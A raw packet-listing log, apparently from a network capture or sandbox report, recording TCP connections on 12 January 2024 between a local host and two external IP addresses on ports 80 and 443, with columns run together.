                                                          Jan 12, 2024 23:12:36.576958895 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.577039003 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.578084946 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.578118086 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.578305960 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.578629017 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.579704046 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.579737902 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.580136061 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.580169916 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.580200911 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:36.580277920 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:37.681456089 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:37.681510925 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:37.681550026 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:37.681560040 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:37.681560040 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:37.681641102 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:37.896413088 CET4973880192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:37.991278887 CET8049738162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:37.991400957 CET4973880192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:37.991643906 CET4973880192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.086586952 CET8049738162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.102488995 CET8049738162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.102804899 CET4973880192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.113576889 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.113686085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.113786936 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.128743887 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.128830910 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.356343031 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.356559038 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.457357883 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.457422018 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.458455086 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.458532095 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.460225105 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.505949974 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.688396931 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.688483953 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.688520908 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.688549042 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.688709974 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.688798904 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.688889027 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.688889027 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.688889027 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.688889980 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.688988924 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689039946 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689064026 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689066887 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689088106 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689109087 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689172983 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689234972 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689275026 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689451933 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689516068 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689517021 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689538002 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689559937 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689625025 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689625025 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689651966 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689698935 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689739943 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689785957 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689822912 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689872026 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.689940929 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.689984083 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.690027952 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.690073013 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.690112114 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.690160036 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.690198898 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.690256119 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.690284014 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.690330982 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.690370083 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.690421104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.693038940 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.693197012 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.693278074 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.693279028 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.693340063 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.693403959 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.701663971 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.701829910 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.701827049 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.701927900 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.701984882 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.701984882 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702008963 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702055931 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702065945 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702115059 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702124119 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702193022 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702203035 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702250004 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702260017 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702303886 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702312946 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702358961 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702368975 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702410936 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702445030 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702507019 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702570915 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702620983 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702680111 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702747107 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702784061 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702841043 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702867031 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.702915907 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.702955008 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.703016996 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.703049898 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.703114033 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.703142881 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.703212976 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.783981085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.784081936 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.785134077 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.785206079 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.785281897 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.785360098 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.785379887 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.785449028 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.788743973 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.788907051 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.788963079 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789047956 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789072990 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.789088011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789093971 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.789143085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789151907 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.789194107 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.797194004 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.797277927 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.797919035 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.797996044 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798017025 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798075914 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798697948 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798784971 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798808098 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798865080 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798909903 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798979044 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.799447060 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.799520016 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.799534082 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.799593925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.882538080 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.882622004 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.882658005 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.882724047 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.884639978 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.884713888 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.884980917 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885049105 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.885272026 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885332108 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.885448933 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885510921 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.885859013 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885926962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.888264894 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.888334036 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.888564110 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.888617992 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.888727903 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.888809919 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.889343977 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.889404058 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.889532089 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.889592886 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.889837027 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.889916897 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.890172958 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.890233040 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.890878916 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.890948057 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.891762972 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.891838074 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.892436981 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.892503977 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.892535925 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.892590046 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894061089 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894130945 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894216061 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894285917 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894476891 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894543886 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894750118 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894805908 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.895698071 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.895761013 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.898958921 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899041891 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899061918 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.899080038 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899106026 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.899127960 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.899166107 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899230003 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.901278019 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.901329994 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.901362896 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.901375055 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.901401043 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.901422977 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.902661085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.902714968 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.902745962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.902755976 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.902784109 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.902818918 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.904489040 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.904536009 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.904567957 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.904577971 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.904608011 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.904624939 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.906533003 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.906574011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.906614065 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.906625032 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.906653881 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.906677008 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.907753944 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.907797098 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.907838106 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.907847881 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.907876015 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.907898903 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.909816980 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.909863949 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.909943104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.909943104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.909957886 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.910012960 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.989139080 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.989200115 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.989247084 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.989264011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.989295006 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.989312887 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087259054 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087281942 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087354898 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087471008 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087471008 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087488890 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087517023 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087548018 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087590933 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087604046 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087624073 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087635040 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087641001 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087651968 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087662935 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087704897 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087706089 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087728024 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087742090 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087769985 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087799072 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.099525928 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.099545956 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.099586010 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.099597931 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.099626064 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.099644899 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101632118 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101653099 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101696014 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101706028 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101726055 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101736069 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101751089 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101756096 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101766109 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101793051 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101794004 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101805925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101816893 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101825953 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101835012 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101856947 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101923943 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101923943 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.104676008 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.104693890 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.104737997 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.104748011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.104782104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.104799986 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105424881 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105443001 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105487108 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105490923 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105501890 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105504036 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105540037 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105562925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105562925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105571985 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105583906 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105616093 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105632067 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105652094 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105663061 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105663061 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105676889 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105735064 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105747938 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105747938 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105747938 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105762959 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105773926 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105807066 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105825901 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105829954 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105839968 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105868101 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105904102 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105914116 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105953932 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105953932 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105953932 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105971098 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105981112 CET44349739162.159.130.233192.168.2.4
